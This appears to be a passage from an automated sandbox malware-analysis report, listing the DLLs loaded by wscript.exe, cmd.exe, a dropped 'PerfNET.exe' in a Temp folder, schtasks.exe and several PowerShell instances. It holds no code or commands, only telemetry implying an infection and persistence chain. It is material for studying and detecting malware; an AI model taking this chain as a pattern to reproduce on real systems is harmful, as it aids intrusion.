                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: mscoree.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: apphelp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: kernel.appcore.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: version.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: uxtheme.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: windows.storage.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: wldp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: profapi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: cryptsp.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: rsaenh.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: cryptbase.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: sspicli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: ktmw32.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: ntmarta.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: wbemcomn.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: amsi.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: userenv.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: propsys.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: dlnashext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: wpdshext.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: edputil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: urlmon.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: iertutil.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: srvcli.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: netutils.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: wintypes.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: appresolver.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: bcp47langs.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: slc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: sppc.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
